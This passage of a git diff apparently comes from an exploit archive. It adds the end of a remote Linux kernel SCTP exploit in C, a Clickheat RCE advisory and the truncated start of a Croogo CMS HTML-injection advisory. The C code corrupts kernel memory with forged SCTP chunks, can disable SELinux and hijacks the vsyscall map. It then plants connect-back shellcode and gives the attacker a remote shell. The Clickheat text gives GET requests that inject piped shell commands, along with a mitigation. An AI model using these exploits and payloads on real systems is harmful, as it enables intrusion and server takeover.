ret, vtag2, tsn2); + +} + + +static void multiplex(int listenfd) +{ + int ret,new_fd; + fd_set r; + struct timeval t; + char buffer[1500]; + + + FD_ZERO(&r); + FD_SET(listenfd, &r); + t.tv_sec = 3; + t.tv_usec = 0; + __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n"); + __msg("[**] .."); + fflush(stdout); + + while(select(listenfd+1, &r, NULL, NULL, &t) == 0) + { + printf(".."); + fflush(stdout); + t.tv_sec = 3; + t.tv_usec = 0; + FD_ZERO(&r); + FD_SET(listenfd, &r); + } + __msg("..\n"); + + new_fd = accept(listenfd, NULL, 0); + if(new_fd < 0) + __fatal_perror("accept: listen fd"); + + + __msg("[**] Connected!\n"); + patchjump(); + + close(listenfd); + + write(new_fd, "id\n", 3); + + FD_ZERO(&r); + FD_SET(new_fd, &r); + FD_SET(0, &r); + while(select(new_fd+1, &r, NULL, NULL, NULL) > 0) + { + if(FD_ISSET(0, &r)) // read from stdin + { + ret = read(0, buffer, sizeof(buffer)); + if(ret < 0) + __fatal_perror("read: from stdin"); + else + ret = write(new_fd, buffer, ret); + } + + if(FD_ISSET(new_fd, &r)) + { + ret = read(new_fd, buffer, sizeof(buffer)); + if(!ret) { + __msg("Endopoint closed the connection\n"); + break; + } + else if(ret > 0) + { + write(1, buffer, ret); + } + else + __fatal_perror("read: from net"); + } + + FD_ZERO(&r); + FD_SET(new_fd, &r); + FD_SET(0, &r); + } + +} + + +/* needed when exploiting old SLAB */ +void swap_to_SLAB_chunk() +{ + __u32 tmp; + __u16 tmp16; + + tmp = tsn; + tsn = tsn2; + tsn2 = tmp; + + tmp = vtag; + vtag = vtag2; + vtag2 = tmp; + + tmp16 = sport; + sport = sport2; + sport2 = tmp16; +} + + + +int main(int argc, char **argv) +{ + + int ret, fd, i, listenfd,o=1; + struct sockaddr_in l; + __u32 lh; + __u16 lp; + + sctp_getopt(argc, argv); + + listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); + if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0) + __fatal_perror("setsockopt: SO_REUSEADDR"); + + l.sin_family = PF_INET; + l.sin_port = htons(h.lport); + l.sin_addr.s_addr = inet_addr(h.lhost); + if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0) + __fatal_perror("bind: sock"); + + if(listen(listenfd, 4) < 0) + __fatal_perror("listen: sock"); + + + /* set connect back params */ + lh = inet_addr(h.lhost); + lp = htons(h.lport); + memcpy(k->scode + k->portoff, &lp, 2); + memcpy(k->scode + k->hostoff, &lh, 4); + + raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); + if(raw_sctp < 0) + __fatal_perror("socket: RAW/SCTP montitor socket"); + + server_sctp.sin_family = PF_INET; + server_sctp.sin_port = htons(h.rport); + server_sctp.sin_addr.s_addr = inet_addr(h.rhost); + + __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n"); + ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL); + if(ret < 0) + __fatal_perror("clone"); + + sleep(1); + + __msg("[**] Start flushing slub cache...\n"); + for(i=0; i<=h.nconn; i++) + { + __u16 p = sport-(h.nconn-1)+i; + if(p == sport || p== sport2) + fd = make_sctp_connection(p, h.rport, 1); + else + fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0); +// usleep(10); + } + + + disable_abort(); + /* wait for monitoring engine */ + wait(NULL); + + if(k->allocator_type == SLAB_ALLOCATOR) + swap_to_SLAB_chunk(); + + if(vtag && tsn && vtag2 && tsn2) + { + __u32 acc; + + __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2); + sleep(1); + + if(k->selinux) + { + __msg("[**] Overwriting neightboard sctp map..\n"); + acc = (k->slubsize - k->chunksize) / 2; + ret = build_stream(k->selinux, k->ptrsize, acc); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); + + __msg("[**] Disabling Selinux Enforcing Mode..\n"); + ret = build_stream(__zero, 4, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + } + + __msg("[**] Overwriting neightboard sctp map ......\n"); + acc = (k->slubsize - k->chunksize) / 2; + ret = build_stream(k->vsysaddr, k->ptrsize, acc); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); + + __msg("[**] Overwriting vsyscall shadow map..\n"); + acc = 0x930 / 2; + ret = build_stream(k->scode, k->scodesize, acc); //1176 + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + + __msg("[**] Hijacking vsyscall shadow map..\n"); + ret = build_stream(k->vsysjump, k->vsysjumpsize, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + + sleep(1); + } + else + __fatal("VTAG/TSN not found: network error"); + + + multiplex(listenfd); + __msg("[**] Closing Connection... \n"); + return 0; +} + +// milw0rm.com [2009-04-28] diff --git a/platforms/perl/webapps/37115.txt b/platforms/perl/webapps/37115.txt new file mode 100755 index 000000000..93f7e8a52 --- /dev/null +++ b/platforms/perl/webapps/37115.txt @@ -0,0 +1,37 @@ +Clickheat 1.13+ Unauthenticated RCE +----------------------------------- + +The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state. + +I have discovered a vulnerability in Clickheat 1.13 onwards that would allow an attacker to execute arbitrary commands on the remote webserver, in the context of the user running the webserver, without authentication. This could lead to unauthenticated access to the Clickheat web application, and potentially complete takeover of the remote webserver. + +For the exploit to be successful, the webserver (Apache was tested in this case) must be configured to handle Perl (.pl) scripts and have the ExecCGI directive present in the VirtualHost configuration. + +The issue stems from a script called parseClickLogs.pl in the /scripts directory of clickheat. If the Apache configuration is setup as above, this script will be executed when a user visits /clickheat/scripts/parseClickLogs.pl, as shown in Apache logs: + +[Tue May 12 13:36:27.068012 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] AH01215: usage: ./parseClickLogs.pl apache_logs_file dest_path [domain_ignored] +[Tue May 12 13:36:27.070133 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] End of script output before headers: parseClickLogs.pl + +Arbitrary parameters can be supplied to the script directly from the URL, separated by +'s. + +In the script, on line 48 is a vulnerable open() command: + +open(LOGFILE, $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile); + +The open() command is vulnerable because the $srcFile parameter has not been sanitized in any way, it is simply the first parameter passed into the script. Also the open() command has not been explicitly set for input only, meaning its behavior can be manipulated by appending a pipe (|) symbol to input parameters. See here for discussion: http://www.cgisecurity.com/lib/sips.html. + +POC +---- +The following POC shows how to gain access to the Clickheat configuration data by copying /clickheat/config/config.php to a plain text file for viewing. + +- Copy config.php using arbitrary commands on the server: +GET /clickheat/scripts/parseClickLogs.pl?cp ../config/config.php conf.txt|+two + +- View newly created copy of config.php (\ is appended to the filename) +GET /clickheat/scripts/conf.txt\ + +Mitigation +---------- +A simple mitigation would be to either remove this script if it is not required by the core functionality of Clickheat, or move it outside of the publicly accessible HTML path. You could also explicitly set the open() to only allow for input, such as: + +open(LOGFILE, "<$srcFile") or die("Impossible d'ouvrir le fichier ".$srcFile); \ No newline at end of file diff --git a/platforms/perl/webapps/37117.txt b/platforms/perl/webapps/37117.txt new file mode 100755 index 000000000..22e6beed5 --- /dev/null +++ b/platforms/perl/webapps/37117.txt @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/53287/info + +Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Croogo CMS 1.3.4 is vulnerable; other versions may also be affected. + +URL: http://www.example.com/croogo/admin/users + +">